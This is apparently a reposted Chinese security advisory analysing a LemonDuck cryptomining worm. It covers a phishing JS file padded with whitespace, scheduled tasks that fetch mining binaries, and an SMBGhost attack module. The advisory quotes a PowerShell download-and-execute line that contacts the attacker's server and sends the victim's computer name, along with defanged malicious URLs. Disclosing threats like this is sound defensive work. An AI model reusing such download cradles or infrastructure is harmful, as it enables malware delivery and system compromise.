「安全通告」新版“LemonDuck”搭载“永恒之蓝”,新增EXE攻击模块惹人关注(3)

2023-04-30 来源:飞速影视
如果没有更新补丁修复Scriptletfile功能,就可能触发漏洞执行PowerShell命令执行恶意代码。钓鱼邮件另一个附件中加入了“readme.zip”,解压后是一个恶意的JS文件“readme.js”,该JS文件开头为“//This File is broken.”,中间被插入大段空白,恶意代码内容在文件尾部,运行后会链接地址下载恶意脚本:http[:]//t.tr2q.com/mail.jsp

「安全通告」新版“LemonDuck”搭载“永恒之蓝”,新增EXE攻击模块惹人关注


创建计划任务下载的http[:]//t.amynx.com/a.jsp文件会下载if.bin和kr.bin以及m6.bin和m6g.in等挖矿程序:

「安全通告」新版“LemonDuck”搭载“永恒之蓝”,新增EXE攻击模块惹人关注


其中攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:powershell IEx(New- ObjectNet.WebClient).DownLoadString(""http[:]///t.amynx.com/smgho.jsp?0.8*%computername%"")

「安全通告」新版“LemonDuck”搭载“永恒之蓝”,新增EXE攻击模块惹人关注


相关影视
合作伙伴
本站仅为学习交流之用,所有视频和图片均来自互联网收集而来,版权归原创者所有,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件(我们会在3个工作日内删除侵权内容,谢谢。)

www.fs94.org-飞速影视 粤ICP备74369512号